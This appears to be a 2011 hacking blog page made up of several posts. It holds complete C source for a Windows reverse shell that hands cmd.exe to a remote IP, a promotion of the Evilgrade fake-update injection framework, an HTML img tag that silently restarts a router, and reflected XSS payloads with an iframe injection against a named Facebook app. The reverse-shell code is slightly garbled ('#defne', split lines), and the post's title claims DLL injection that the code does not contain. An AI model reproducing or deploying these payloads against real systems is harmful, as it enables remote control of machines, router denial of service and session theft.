Pages

Monday, October 31, 2011

Reverse shell through DLL Injection using undocumented API function

AJVrs.c
Reverse shell in win32
(c) by Andreas Venieris (aka thiseas) 2010
Compile with VS 2008 from command line with cl:
C:> cl AJVrs.c
******************************************************
*********/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib") // Inform the
linker that
// the Ws2_32.lib
fle is needed.
#defne DEFAULT_PORT 1234
#defne DEFAULT_IP "192.168.1.70"
WSADATA wsaData;
SOCKET Winsocket;
STARTUPINFO theProcess;
PROCESS_INFORMATION info_proc;
struct sockaddr_in Winsocket_Structure;
int main(int argc, char *argv[])
{
char *IP = DEFAULT_IP;
short port = DEFAULT_PORT;
if (argc == 3){
strncpy(IP,argv[1],16);
port = atoi(argv[2]);
}

WSAStartup(MAKEWORD(2,2), &wsaData);
Winsocket=WSASocket(AF_INET, SOCK_STREAM,
IPPROTO_TCP,NULL, (unsigned int)
NULL, (unsigned int) NULL);
Winsocket_Structure.sin_port=htons(port);
Winsocket_Structure.sin_family=AF_INET;
Winsocket_Structure.sin_addr.s_addr=inet_
addr(IP);
if(Winsocket==INVALID_SOCKET)
{
WSACleanup();
return 1;
}
if(WSAConnect(Winsocket,(SOCKADDR*)&Winsocket_Str
ucture,sizeof(Winsocket_Structure),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
{
WSACleanup();
}
  // Starting shell by creating a new process with
i/o redirection.
memset(&theProcess,0,sizeof(theProcess));
theProcess.cb=sizeof(theProcess);
theProcess.dwFlags=STARTF_USESTDHANDLES;

  // here we make the redirection
theProcess.hStdInput = theProcess.hStdOutput
= theProcess.hStdError =
(HANDLE)Winsocket;

// fork the new process.
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,
0,NULL,NULL,&theProcess,&info_
proc)==0)
{
WSACleanup();
return 1;
}
return 0;
}

Hijacking Software updates with Evilgrade

Now a days software developers do not spend much time on updates and secure delivery mechanisms. That’s
why standard processes for updating applications make many users vulnerable The process is as follows:

• Application by initiates update process.

• Application will connect to the DNS server host for example update.app1.com

• DNS server replies with server IP (for example 200.1.1.1).

• Application downloads a special file with information about the update, for example lastupdate.xml from update.app1.com

• Application analyzes the update file and detects new updates.

• Finally App1 downloads and execute the update:
http://update.app1.com/update.exe

      A lot of applications do not verify the update’s contents and blindly trust the master update server. This does nothing to prevent an attacker pretending to be the update server and submit an application file to run on the system.Evilgrade is modular framework that allows attackers to take advantage of poor update implementations by injecting fake updates.

Google code mirror of Evilgrade

Enjoy...

to shut down router by using HTML code

its a very simple trick that by using html code we can shut down routers ...
code is here

<img widtgh=0 height=0
src=”http://192.168.1.3/FormSub.cgi2&restart=0&RestartStart=1&Restart=Restart”>
</img>

Enjoy...

Monday, October 3, 2011

Enter your email address:

Delivered by FeedBurner

Vulnerable Facebook Applications

Facebook has always been under the scanner because of its privacy issues. Since its release in 2004,
it has been target several times because of its security measures. Over the course of time Facebook
did learn from its mistakes and improved its security measures of how people share information on
the platform. But an area where they still don’t have much control is the applications that are built
using the platform. Here is a statement from Facebook’s privacy policy about Third party
applications - we do not own or operate the applications or websites that use Facebook
Platform. That means that when you use those applications and websites you are making
your Facebook information available to someone other than Facebook.
This is where the users should be careful. Applications running on Facebook cannot be trusted unles
it belongs to a popular app builder. There are various such malicious and vulnerable Facebook
applications running on the platform which can misuse the information that you share. Facebook ha
become the prime target of spammers and hackers because of its heavy popularity among people
and because most of the users are unaware of such issues, they keep on clicking every application
that comes in their notification. The main aim of this paper is to make users aware of the fact that
every application on Facebook cannot be trusted.
While performing some tests on Facebook platform, I came across a vulnerable application that can
be attacked using Cross site scripting. The application can be found at this link :
http://apps.facebook.com/name_meaning/ . This application tells you the meaning of your name.


As you can see that the application has a text box where the user can enter his/her name to find out
the meaning. I went on to check this application with a normal reflected XSS attack by entering a
small javascript : <script>alert(“HackingAlert”)</script>
This injection didn’t work. So I went on to try my second dork with a bit of advanced script injection
to bypass the filter mechanism. The next javascript that I tried was :
>”><script>alert(“HackingAlert”)</script>” .
This time the attack succeeded and an alert message was generated showing the successful
execution of the script. 


I further went on to check if I can insert more dangerous tags or not. The next script that i crafted
contained an <iframe> tag to check if my respective iframe gets displayed in place of the application
or not. The attack succeeded again and instead of displaying the application in the iframe area, it
displayed my blog url which I had inserted in my script.
Here is my crafted script :
>"><script>alert("HackingAlert")</script><iframe
src="http://hackingalert.blogspot.com" width="400" height="400"></iframe>"

NOTE – You will have to shift to http version of Facebook instead of https in order
to use any of its third party applications. 





 Now any attacker can display a malicious link in the iframe area and spread the url. The attacker can
use this technique to steal cookies and perform session hijacking.


Looking at this url, any normal user would believe that it belongs to the Facebook application. In-fact
it does belong to it but it has been crafted to attack the user information. This vulnerability can
easily be used to steal cookies of legitimate users and lead to their security breach.
Hence it is highly recommended that you should not trust any facebook application blindly. Recently
lots of spam and such vulnerable apps have flooded the platform and Facebook will not take any
responsibility for any information that you share with third party applications within the platform. So
think before you CLICK!!

 

Related Posts Plugin for WordPress, Blogger...